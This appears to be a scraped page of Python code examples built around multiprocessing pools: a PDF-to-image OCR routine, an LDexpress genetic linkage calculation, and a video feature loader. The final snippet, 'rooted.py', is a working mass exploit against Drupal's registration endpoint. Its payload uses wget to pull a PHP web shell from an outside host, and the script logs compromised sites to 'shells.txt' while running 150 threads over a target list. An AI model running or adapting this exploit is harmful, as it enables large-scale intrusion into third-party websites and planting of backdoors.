                os.system('tesseract --oem 1 -l eng --psm 6 %s %s' %
                          (image_path, filename))
            return 0

        def generate_images(pages_list):
            for p_num in pages_list:
                print('Generating images %s' % p_num)
                convert_from_path(self.file_path,
                                  dpi=self.generate_images_dpi,
                                  output_folder=self.images_folder,
                                  first_page=p_num,
                                  last_page=p_num,
                                  fmt='png')
                print('Generating images completed %s' % p_num)
            return 0

        if to_pdf:
            paths = glob.glob('%s/*.png' % self.images_folder)
            print(paths)

            def multi_run_wrapper(args):
                return image_to_pdf(*args)

        elif to_text:
            paths = glob.glob('%s/*.png' % self.images_folder)

            def multi_run_wrapper(args):
                return image_to_text(*args)

        elif gen_images:
            paths = list(range(1, self.pages + 1))  # pages_list

            def multi_run_wrapper(args):
                return generate_images(*args)

        def divide_range(seq, num):
            avg = len(seq) / float(num)
            out = list()
            last = 0.0
            while last < len(seq):
                out.append([int(last), int(last + avg)])
                last += avg
            return out

        arg_data = list()

        for n in divide_range(range(len(paths)), self.pool_size):
            final_list = paths[n[0]:n[1]]
            arg_data.append([final_list])

        pool = Pool(self.pool_size)
        response_data = pool.map(multi_run_wrapper, arg_data)
        pool.close()
        pool.join()
        print('Done multiprocessing')
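
divide_range() above splits the work into pool_size roughly equal index ranges, one chunk per worker call through multi_run_wrapper. A quick standalone illustration of the chunking (the function is copied here so the example runs by itself):

def divide_range(seq, num):
    avg = len(seq) / float(num)
    out = list()
    last = 0.0
    while last < len(seq):
        out.append([int(last), int(last + avg)])
        last += avg
    return out

pages = list(range(10))
for lo, hi in divide_range(range(len(pages)), 3):
    print(pages[lo:hi])  # [0, 1, 2], then [3, 4, 5], then [6, 7, 8, 9]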
コード例 #58
0
def calculate_express(snplst,
                      pop,
                      request,
                      web,
                      tissues,
                      r2_d,
                      genome_build,
                      r2_d_threshold=0.1,
                      p_threshold=0.1,
                      window=500000):
    print("##### START LD EXPRESS CALCULATION #####")
    print("raw snplst", snplst)
    print("raw pop", pop)
    print("raw request", request)
    print("raw web", web)
    print("raw tissues", tissues)
    print("raw r2_d", r2_d)
    print("raw r2_d_threshold", r2_d_threshold)
    print("raw p_threshold", p_threshold)
    print("raw window", window)
    print("raw genome_build", genome_build)

    full_start = timer()

    # SNP limit
    max_list = 10

    # Ensure tmp directory exists
    if not os.path.exists(tmp_dir):
        os.makedirs(tmp_dir)

    errors_warnings = {}

    # Validate genome build param
    if genome_build not in genome_build_vars['vars']:
        errors_warnings[
            "error"] = "Invalid genome build. Please specify either " + ", ".join(
                genome_build_vars['vars']) + "."
        return ("", "", "", "", "", errors_warnings)

    # Validate window size is between 0 and 1,000,000
    if window < 0 or window > 1000000:
        errors_warnings[
            "error"] = "Window value must be a number between 0 and 1,000,000."
        return ("", "", "", "", "", errors_warnings)

    # Parse SNPs list
    snps_raw = snplst.split("+")
    # Generate error if # of inputted SNPs exceeds limit
    if len(snps_raw) > max_list:
        errors_warnings["error"] = "Maximum SNP list is " + \
            str(max_list)+" RS numbers. Your list contains " + \
            str(len(snps_raw))+" entries."
        return ("", "", "", "", "", errors_warnings)
    # Remove duplicate RS numbers
    sanitized_query_snps = []
    for snp_raw in snps_raw:
        snp = snp_raw.strip()
        # entries are stored as single-element lists, so compare the wrapped form
        if [snp] not in sanitized_query_snps:
            sanitized_query_snps.append([snp])

    # Connect to Mongo database
    if env == 'local':
        mongo_host = api_mongo_addr
    else:
        mongo_host = 'localhost'
    if web:
        client = MongoClient(
            'mongodb://' + mongo_username + ':' + mongo_password + '@' +
            mongo_host + '/admin', mongo_port)
    else:
        if env == 'local':
            client = MongoClient(
                'mongodb://' + mongo_username + ':' + mongo_password + '@' +
                mongo_host + '/admin', mongo_port)
        else:
            client = MongoClient('localhost', mongo_port)
    db = client["LDLink"]
    # Check if dbsnp collection in MongoDB exists, if not, display error
    if "dbsnp" not in db.list_collection_names():
        errors_warnings[
            "error"] = "dbSNP is currently unavailable. Please contact support."
        return ("", "", "", "", "", errors_warnings)

    # Select desired ancestral populations
    pops = pop.split("+")
    pop_dirs = []
    for pop_i in pops:
        if pop_i in [
                "ALL", "AFR", "AMR", "EAS", "EUR", "SAS", "ACB", "ASW", "BEB",
                "CDX", "CEU", "CHB", "CHS", "CLM", "ESN", "FIN", "GBR", "GIH",
                "GWD", "IBS", "ITU", "JPT", "KHV", "LWK", "MSL", "MXL", "PEL",
                "PJL", "PUR", "STU", "TSI", "YRI"
        ]:
            pop_dirs.append(data_dir + population_samples_dir + pop_i + ".txt")
        else:
            errors_warnings[
                "error"] = pop_i + " is not an ancestral population. Choose one of the following ancestral populations: AFR, AMR, EAS, EUR, or SAS; or one of the following sub-populations: ACB, ASW, BEB, CDX, CEU, CHB, CHS, CLM, ESN, FIN, GBR, GIH, GWD, IBS, ITU, JPT, KHV, LWK, MSL, MXL, PEL, PJL, PUR, STU, TSI, or YRI."
            return ("", "", "", "", "", errors_warnings)

    # get_pops = "cat " + " ".join(pop_dirs)
    # proc = subprocess.Popen(get_pops, shell=True, stdout=subprocess.PIPE)
    # pop_list = [x.decode('utf-8') for x in proc.stdout.readlines()]

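    # Concatenate the selected population sample-ID files into a single
    # temp file for this request.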
    get_pops = "cat " + " ".join(
        pop_dirs) + " > " + tmp_dir + "pops_" + request + ".txt"
    subprocess.call(get_pops, shell=True)

    pop_list = open(tmp_dir + "pops_" + request + ".txt").readlines()

    ids = [i.strip() for i in pop_list]
    pop_ids = list(set(ids))

    # tissue_ids = tissue.split("+")
    # print("tissue_ids", tissue_ids)

    # Get rs number from genomic coordinates from dbsnp
    def get_rsnum(db, coord):
        temp_coord = coord.strip("chr").split(":")
        chro = temp_coord[0]
        pos = temp_coord[1]
        query_results = db.dbsnp.find({
            "chromosome":
            str(chro),
            genome_build_vars[genome_build]['position']:
            str(pos)
        })
        query_results_sanitized = json.loads(json_util.dumps(query_results))
        return query_results_sanitized

    # Replace input genomic coordinates with variant ids (rsids)
    def replace_coords_rsid(db, snp_lst):
        new_snp_lst = []
        for snp_raw_i in snp_lst:
            if snp_raw_i[0][0:2] == "rs":
                new_snp_lst.append(snp_raw_i)
            else:
                snp_info_lst = get_rsnum(db, snp_raw_i[0])
                if snp_info_lst is not None:
                    if len(snp_info_lst) > 1:
                        var_id = "rs" + snp_info_lst[0]['id']
                        ref_variants = []
                        for snp_info in snp_info_lst:
                            if snp_info['id'] == snp_info['ref_id']:
                                ref_variants.append(snp_info['id'])
                        if len(ref_variants) > 1:
                            var_id = "rs" + ref_variants[0]
                            if "warning" in errors_warnings:
                                errors_warnings["warning"] = errors_warnings["warning"] + \
                                    ". Multiple rsIDs (" + ", ".join(["rs" + ref_id for ref_id in ref_variants]) + ") map to genomic coordinates " + snp_raw_i[0]
                            else:
                                errors_warnings[
                                    "warning"] = "Multiple rsIDs (" + ", ".join(
                                        [
                                            "rs" + ref_id
                                            for ref_id in ref_variants
                                        ]
                                    ) + ") map to genomic coordinates " + snp_raw_i[
                                        0]
                        elif len(ref_variants) == 0 and len(snp_info_lst) > 1:
                            var_id = "rs" + snp_info_lst[0]['id']
                            # ref_variants is empty in this branch, so list the
                            # candidate rsIDs from snp_info_lst in the warning
                            multiple_ids = ", ".join(
                                ["rs" + snp_info['id'] for snp_info in snp_info_lst])
                            if "warning" in errors_warnings:
                                errors_warnings["warning"] = errors_warnings["warning"] + \
                                    ". Multiple rsIDs (" + multiple_ids + \
                                    ") map to genomic coordinates " + snp_raw_i[0]
                            else:
                                errors_warnings["warning"] = "Multiple rsIDs (" + multiple_ids + \
                                    ") map to genomic coordinates " + snp_raw_i[0]
                        else:
                            var_id = "rs" + ref_variants[0]
                        new_snp_lst.append([var_id])
                    elif len(snp_info_lst) == 1:
                        var_id = "rs" + snp_info_lst[0]['id']
                        new_snp_lst.append([var_id])
                    else:
                        new_snp_lst.append(snp_raw_i)
                else:
                    new_snp_lst.append(snp_raw_i)
        return new_snp_lst

    sanitized_query_snps = replace_coords_rsid(db, sanitized_query_snps)
    print("sanitized_query_snps", sanitized_query_snps)

    # Find genomic coords of query snps in dbsnp
    details = {}
    rs_nums = []
    snp_pos = []
    snp_coords = []
    warn = []
    # windowWarnings = []
    queryWarnings = []
    for snp_i in sanitized_query_snps:
        if (len(snp_i) > 0 and len(snp_i[0]) > 2):
            if (snp_i[0][0:2] == "rs"
                    or snp_i[0][0:3] == "chr") and snp_i[0][-1].isdigit():
                # query variant to get genomic coordinates in dbsnp
                snp_coord = get_coords(db, snp_i[0])
                if snp_coord is not None and snp_coord[
                        genome_build_vars[genome_build]['position']] != "NA":
                    # check if variant is on chrY for genome build = GRCh38
                    if snp_coord['chromosome'] == "Y" and (
                            genome_build == "grch38"
                            or genome_build == "grch38_high_coverage"):
                        if "warning" in errors_warnings:
                            errors_warnings["warning"] = errors_warnings["warning"] + \
                                ". " + "Input variants on chromosome Y are unavailable for GRCh38, only available for GRCh37 (" + "rs" + snp_coord['id'] + " = chr" + snp_coord['chromosome'] + ":" + snp_coord[genome_build_vars[genome_build]['position']] + ")"
                        else:
                            errors_warnings[
                                "warning"] = "Input variants on chromosome Y are unavailable for GRCh38, only available for GRCh37 (" + "rs" + snp_coord[
                                    'id'] + " = chr" + snp_coord[
                                        'chromosome'] + ":" + snp_coord[
                                            genome_build_vars[genome_build]
                                            ['position']] + ")"
                        warn.append(snp_i[0])
                    else:
                        rs_nums.append(snp_i[0])
                        snp_pos.append(snp_coord[
                            genome_build_vars[genome_build]['position']])
                        temp = [
                            snp_i[0],
                            str(snp_coord['chromosome']),
                            int(snp_coord[genome_build_vars[genome_build]
                                          ['position']])
                        ]
                        snp_coords.append(temp)
                else:
                    # Generate warning if query variant is not found in dbsnp
                    warn.append(snp_i[0])
                    queryWarnings.append([
                        snp_i[0], "NA", "Variant not found in dbSNP" +
                        dbsnp_version + ", variant removed."
                    ])
            else:
                # Generate warning if query variant is not a genomic position or rs number
                warn.append(snp_i[0])
                queryWarnings.append(
                    [snp_i[0], "NA", "Not a valid SNP, variant removed."])
        else:
            # Generate error for empty query variant
            errors_warnings["error"] = "Input list of RS numbers is empty"
            subprocess.call("rm " + tmp_dir + "pops_" + request + ".txt",
                            shell=True)
            return ("", "", "", "", "", errors_warnings)

    # Generate warnings for query variants not found in dbsnp
    if warn != []:
        if "warning" in errors_warnings:
            errors_warnings["warning"] = errors_warnings["warning"] + \
                ". The following RS number(s) or coordinate(s) inputs have warnings: " + ", ".join(warn)
        else:
            errors_warnings[
                "warning"] = "The following RS number(s) or coordinate(s) inputs have warnings: " + ", ".join(
                    warn)

    # Generate errors if no query variants are valid in dbsnp
    if len(rs_nums) == 0:
        errors_warnings[
            "error"] = "Input SNP list does not contain any valid RS numbers or coordinates. " + errors_warnings[
                "warning"]
        subprocess.call("rm " + tmp_dir + "pops_" + request + ".txt",
                        shell=True)
        return ("", "", "", "", "", errors_warnings)

    thinned_snps = []

    print("##### FIND GWAS VARIANTS IN WINDOW #####")
    # establish low/high window for each query snp
    # ex: window = 500000 # -/+ 500Kb = 500,000Bp = 1Mb = 1,000,000 Bp total
    combined_matched_snps = []
    for snp_coord in snp_coords:
        find_window_ld_start = timer()

        (geno,
         queryVariantWarnings) = get_query_variant(snp_coord, pop_ids,
                                                   str(request), genome_build)
        # print("geno", geno)
        # print("queryVariantWarnings", queryVariantWarnings)
        if (len(queryVariantWarnings) > 0):
            queryWarnings += queryVariantWarnings
        if (geno is not None):
            ###### SPLIT TASK UP INTO # PARALLEL SUBPROCESSES ######

            # find query window snps via tabix, calculate LD and apply R2/D' thresholds
            windowChunkRanges = chunkWindow(snp_coord[2], window,
                                            num_subprocesses)

            ld_subprocess_commands = []
            for subprocess_id in range(num_subprocesses):
                getWindowVariantsArgs = " ".join([
                    str(web),
                    str(snp_coord[0]),
                    str(snp_coord[1]),
                    str(windowChunkRanges[subprocess_id][0]),
                    str(windowChunkRanges[subprocess_id][1]),
                    str(request),
                    str(subprocess_id),
                    str(r2_d),
                    str(r2_d_threshold),
                    str(genome_build)
                ])
                # print("getWindowVariantsArgs", getWindowVariantsArgs)
                ld_subprocess_commands.append("python3 LDexpress_ld_sub.py " +
                                              getWindowVariantsArgs)

            ld_subprocesses = [
                subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
                for command in ld_subprocess_commands
            ]
            # collect output in parallel
            pool = Pool(len(ld_subprocesses))
            windowLDSubsets = pool.map(get_output, ld_subprocesses)
            pool.close()
            pool.join()

            # flatten pooled ld window results
            windowLDSubsetsFlat = [
                val.decode('utf-8').strip().split("\t")
                for sublist in windowLDSubsets for val in sublist
            ]
            # print("windowLDSubsetsFlat length", len(windowLDSubsetsFlat))

            find_window_ld_end = timer()
            # print("FIND WINDOW SNPS AND CALCULATE LD TIME ELAPSED:", str(find_window_ld_end - find_window_ld_start) + "(s)")

            # find gtex tissues for window snps via mongodb, apply p-value threshold

            query_window_tissues_start = timer()

            windowLDSubsetsChunks = np.array_split(windowLDSubsetsFlat,
                                                   num_subprocesses)

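            # Write each chunk of window LD results to a per-subprocess temp file
            # (express_ld_<subprocess_id>_<request>.txt) for the tissue lookup step.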
            for subprocess_id in range(num_subprocesses):
                with open(
                        tmp_dir + 'express_ld_' + str(subprocess_id) + '_' +
                        str(request) + '.txt', 'w') as snpsLDFile:
                    for snp_ld_data in windowLDSubsetsChunks[
                            subprocess_id].tolist():
                        snpsLDFile.write("\t".join(snp_ld_data) + "\n")

            tissues_subprocess_commands = []
            for subprocess_id in range(num_subprocesses):
                getTissuesArgs = " ".join([
                    str(web),
                    str(request),
                    str(subprocess_id),
                    str(p_threshold),
                    str(tissues),
                    str(genome_build)
                ])
                tissues_subprocess_commands.append(
                    "python3 LDexpress_tissues_sub.py " + getTissuesArgs)

            tissues_subprocesses = [
                subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
                for command in tissues_subprocess_commands
            ]

            # getTissuesArgs = []
            # for subprocess_id in range(num_subprocesses):
            #     getTissuesArgs.append([windowLDSubsetsChunks[subprocess_id].tolist(), subprocess_id, p_threshold, tissue_ids, web])
            # with Pool(processes=num_subprocesses) as pool:
            #     tissueResultsSubsets = pool.map(get_tissues_sub, getTissuesArgs)

            # collect output in parallel
            pool = Pool(len(tissues_subprocesses))
            tissueResultsSubsets = pool.map(get_output, tissues_subprocesses)
            pool.close()
            pool.join()

            # flatten pooled tissues results
            matched_snps = [
                val.decode('utf-8').strip().split("\t")
                for sublist in tissueResultsSubsets for val in sublist
            ]

            # print("FINAL # RESULTS FOR", snp_coord[0], len(matched_snps))
            if (len(matched_snps) > 0):
                # details[snp_coord[0]] = {
                # details["results"] = {
                #     "aaData": matched_snps
                # }
                combined_matched_snps += matched_snps
                # add snp to thinned_snps
                thinned_snps.append(snp_coord[0])
            else:
                queryWarnings.append([
                    snp_coord[0],
                    "chr" + str(snp_coord[1]) + ":" + str(snp_coord[2]),
                    "No entries in GTEx are identified using the LDexpress search criteria."
                ])

            query_window_tissues_end = timer()
            print(
                "QUERY WINDOW TISSUES TIME ELAPSED:",
                str(query_window_tissues_end - query_window_tissues_start) +
                "(s)")
        # clean up tmp files generated by each query snp
        subprocess.call("rm " + tmp_dir + "*" + request + "*.vcf", shell=True)
        subprocess.call("rm " + tmp_dir + "express_ld_*_" + str(request) +
                        ".txt",
                        shell=True)

    # add full results
    details["results"] = {"aaData": combined_matched_snps}

    # find unique thinned genes and tissues
    thinned_genes = sorted(
        list(set(list(map(lambda row: row[5], combined_matched_snps)))))
    thinned_tissues = sorted(
        list(set(list(map(lambda row: row[7], combined_matched_snps)))))

    # clean up tmp file(s) generated by each calculation
    subprocess.call("rm " + tmp_dir + "pops_" + request + ".txt", shell=True)

    details["queryWarnings"] = {"aaData": queryWarnings}

    # Check if thinned list is empty, if it is, display error
    if len(thinned_snps) < 1:
        errors_warnings[
            "error"] = "No entries in GTEx are identified using the LDexpress search criteria."
        return ("", "", "", "", "", errors_warnings)

    full_end = timer()
    print("TIME ELAPSED:", str(full_end - full_start) + "(s)")
    print("##### LDEXPRESS COMPLETE #####")

    return (sanitized_query_snps, thinned_snps, thinned_genes, thinned_tissues,
            details, errors_warnings)
コード例 #59
0
class AsyncVideoFeaturesLoaderBreakfast():
    """
    Load features for the video frames.
    """
    def __init__(self,
                 feats_path,
                 target,
                 n_frames_per_video,
                 batch_size,
                 n_feat_maps,
                 feat_map_side_dim,
                 n_threads=10):
        random.seed(101)
        np.random.seed(101)

        self.__feats_pathes = feats_path
        self.__n_frames_per_video = n_frames_per_video
        self.__n_feat_maps = n_feat_maps
        self.__feat_map_side_dim = feat_map_side_dim

        self.__batch_size = batch_size
        self.__y = target

        self.__is_busy = False
        self.__batch_features = None
        self.__batch_y = None
        self.__n_threads_in_pool = n_threads
        self.__pool = Pool(self.__n_threads_in_pool)

    def load_feats_in_batch(self, batch_number):
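        # Kick off asynchronous loading of one batch; worker threads fill
        # self.__batch_features and the map_async callback clears the busy flag.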
        self.__is_busy = True

        idx_batch = batch_number - 1
        start_idx = idx_batch * self.__batch_size
        stop_idx = (idx_batch + 1) * self.__batch_size

        batch_feat_pathes = self.__feats_pathes[start_idx:stop_idx]
        batch_y = self.__y[start_idx:stop_idx]

        n_batch_feats = len(batch_feat_pathes)
        n_batch_y = len(batch_y)
        idxces = range(0, n_batch_feats)

        assert n_batch_feats == n_batch_y

        # parameters passed to the reading function
        params = [data_item for data_item in zip(idxces, batch_feat_pathes)]

        # set list of batch features before start reading
        batch_feats_shape = (n_batch_feats, self.__n_frames_per_video,
                             self.__feat_map_side_dim,
                             self.__feat_map_side_dim, self.__n_feat_maps)

        self.__batch_features = np.zeros(batch_feats_shape, dtype=np.float32)
        self.__batch_y = batch_y

        # start pool of threads
        self.__pool.map_async(self.__load_features,
                              params,
                              callback=self.__thread_pool_callback)

    def get_batch_data(self):
        if self.__is_busy:
            raise Exception(
                'Sorry, you can\'t get features while threads are running!')
        else:
            return (self.__batch_features, self.__batch_y)

    def get_y(self):
        return self.__y

    def is_busy(self):
        return self.__is_busy

    def __thread_pool_callback(self, args):
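        # Called by map_async once every feature-loading task has finished.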
        self.__is_busy = False

    def __load_features(self, params):

        idx_video = params[0]
        feats_path = params[1]
        video_name = feats_path.split('/')[-1]

        try:
            # load feature from file
            feats = utils.pkl_load(feats_path)

            n_feats = len(feats)
            assert n_feats == self.__n_frames_per_video, 'Sorry, wrong number of frames, expected: %d, got: %d' % (
                self.__n_frames_per_video, n_feats)
            self.__batch_features[idx_video] = feats

        except Exception as exp:
            print('\nSorry, error in loading feature %s' % (feats_path))
            print(exp)

    def shuffle_data(self):
        """
        shuffle these data: self.__feats_pathes, self.__y
        :return:
        """

        n_samples = len(self.__feats_pathes)

        # range objects cannot be shuffled in place (Python 3); draw a random
        # permutation of indices instead. The fancy indexing below assumes
        # feats_path and target were passed in as numpy arrays.
        idx = np.random.permutation(n_samples)
        self.__feats_pathes = self.__feats_pathes[idx]
        self.__y = self.__y[idx]

    def close(self):
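        # close() stops new task submissions; terminate() then stops the worker
        # threads without waiting for any pending work to finish.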
        self.__pool.close()
        self.__pool.terminate()
コード例 #60
0
ファイル: rooted.py プロジェクト: Joy-Majumdar/rooted
    'markup',
    'mail[#markup]':
    'wget https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php'
}
headers = {
    'User-Agent':
    'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'
}


def run(u):
    try:
        url = u + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
        r = requests.post(url, data=payload, verify=False, headers=headers)
        if 'Select Your File :' in requests.get(u + '/payload.php',
                                                verify=False,
                                                headers=headers).text:
            print(u, '==> RCE')
            with open('shells.txt', mode='a') as d:
                d.write(u + '/payload.php\n')
        else:
            print(u, "==> Not Vuln")
    except:
        pass


mp = Pool(150)
mp.map(run, target)
mp.close()
mp.join()